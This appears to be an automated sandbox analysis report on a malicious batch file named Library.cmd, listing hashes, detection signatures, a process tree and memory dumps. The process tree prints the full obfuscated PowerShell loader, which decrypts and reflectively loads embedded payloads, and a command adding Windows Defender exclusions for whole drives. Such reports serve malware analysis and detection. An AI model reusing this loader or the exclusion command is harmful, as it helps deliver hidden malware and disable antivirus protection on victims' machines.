Resubmissions

25-07-2024 23:32

240725-3jrj5sverf 8

25-07-2024 19:34

240725-x96h4azenm 8

25-07-2024 17:53

240725-wgedgaveml 8

25-07-2024 17:32

240725-v4d6jsxekd 8

Analysis

  • max time kernel
    431s
  • max time network
    434s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-07-2024 17:53

General

  • Target

    Library.cmd

  • Size

    3.3MB

  • MD5

    705ac80b02f73faec8180190bd2b8ce2

  • SHA1

    4f1e20556015edeee8795ea7ef6137b4341b3d80

  • SHA256

    1a357366ee69f83a9c091ee775a44e5cc0fbc2524a50332f9ed261f9ca2d727b

  • SHA512

    da1981a69dee947f2e490c07d452a2881b7a01d09bd6de70ebd9df648db6d8804bbdccff62c40d1a6796ff77ce107cfd01f1dce24369b2b973081c78e5d0de56

  • SSDEEP

    49152:8e90YDSczQOfmBTZ7fSU13LvMeEZng0PJFGrbxM+:0

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Library.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2992
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\Library.cmd
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4544
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\Library.cmd';$aYUO='LEWmKoaEWmKdEWmK'.Replace('EWmK', ''),'FEbiYrEbiYomBEbiYaseEbiY64EbiYStrEbiYinEbiYgEbiY'.Replace('EbiY', ''),'Invkamvokamvkkamvekamv'.Replace('kamv', ''),'TrvTXdavTXdnvTXdsfvTXdovTXdrmvTXdFinvTXdalvTXdBlovTXdckvTXd'.Replace('vTXd', ''),'CojZDOpjZDOyTjZDOojZDO'.Replace('jZDO', ''),'SplzVMQitzVMQ'.Replace('zVMQ', ''),'GeRWEbtRWEbCuRWEbrreRWEbntRWEbPrRWEboceRWEbsRWEbsRWEb'.Replace('RWEb', ''),'ChNhmQaNhmQnNhmQgeENhmQxNhmQtenNhmQsiNhmQonNhmQ'.Replace('NhmQ', ''),'EnoyyatoyyaryoyyaPooyyainoyyatoyya'.Replace('oyya', ''),'ElxdPsexdPsmxdPsenxdPstxdPsAtxdPs'.Replace('xdPs', ''),'Dblyiecblyiomblyipblyirblyieblyisblyisblyi'.Replace('blyi', ''),'MaAIfzinAIfzMoAIfzduAIfzleAIfz'.Replace('AIfz', ''),'RearCLadarCLLiarCLnesarCL'.Replace('arCL', ''),'CqIOIreaqIOItqIOIeDqIOIeqIOIcrqIOIypqIOItoqIOIrqIOI'.Replace('qIOI', '');powershell -w hidden;function IocxM($diQol){$NvznA=[System.Security.Cryptography.Aes]::Create();$NvznA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NvznA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NvznA.Key=[System.Convert]::($aYUO[1])('kL1UBtUuFDE9V9LM/Uk/WvdRxJsjj9H6CX3jPEUZ+No=');$NvznA.IV=[System.Convert]::($aYUO[1])('jvlbrCPvcqHagDjBk0TemQ==');$cPnJJ=$NvznA.($aYUO[13])();$gpChW=$cPnJJ.($aYUO[3])($diQol,0,$diQol.Length);$cPnJJ.Dispose();$NvznA.Dispose();$gpChW;}function uBxZK($diQol){$RwHhF=New-Object System.IO.MemoryStream(,$diQol);$fYqcC=New-Object System.IO.MemoryStream;$dpVKq=New-Object System.IO.Compression.GZipStream($RwHhF,[IO.Compression.CompressionMode]::($aYUO[10]));$dpVKq.($aYUO[4])($fYqcC);$dpVKq.Dispose();$RwHhF.Dispose();$fYqcC.Dispose();$fYqcC.ToArray();}$iBXfm=[System.IO.File]::($aYUO[12])([Console]::Title);$Hnkcn=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 5).Substring(2))));$AFLeb=uBxZK (IocxM ([Convert]::($aYUO[1])([System.Linq.Enumerable]::($aYUO[9])($iBXfm, 6).Substring(2))));[System.Reflection.Assembly]::($aYUO[0])([byte[]]$AFLeb).($aYUO[8]).($aYUO[2])($null,$null);[System.Reflection.Assembly]::($aYUO[0])([byte[]]$Hnkcn).($aYUO[8]).($aYUO[2])($null,$null); "
        3⤵
          PID:4680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Blocklisted process makes network request
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3100
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3732

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      3f01549ee3e4c18244797530b588dad9

      SHA1

      3e87863fc06995fe4b741357c68931221d6cc0b9

      SHA256

      36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

      SHA512

      73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

      Filesize

      2KB

      MD5

      e4de99c1795fd54aa87da05fa39c199c

      SHA1

      dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

      SHA256

      23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

      SHA512

      796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1uhu4tan.e0c.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2724-32-0x00007FFB77C60000-0x00007FFB77D1E000-memory.dmp

      Filesize

      760KB

    • memory/2724-11-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/2724-13-0x000001E979E50000-0x000001E979E94000-memory.dmp

      Filesize

      272KB

    • memory/2724-14-0x000001E97A2A0000-0x000001E97A316000-memory.dmp

      Filesize

      472KB

    • memory/2724-12-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/2724-48-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/2724-6-0x000001E979B30000-0x000001E979B52000-memory.dmp

      Filesize

      136KB

    • memory/2724-45-0x000001E900000000-0x000001E901000000-memory.dmp

      Filesize

      16.0MB

    • memory/2724-30-0x000001E979B20000-0x000001E979B2A000-memory.dmp

      Filesize

      40KB

    • memory/2724-0-0x00007FFB5BA43000-0x00007FFB5BA45000-memory.dmp

      Filesize

      8KB

    • memory/2724-31-0x00007FFB79A50000-0x00007FFB79C45000-memory.dmp

      Filesize

      2.0MB

    • memory/2724-33-0x000001E97A6B0000-0x000001E97A93A000-memory.dmp

      Filesize

      2.5MB

    • memory/3100-20-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/3100-29-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/3100-26-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB

    • memory/3100-25-0x00007FFB5BA40000-0x00007FFB5C501000-memory.dmp

      Filesize

      10.8MB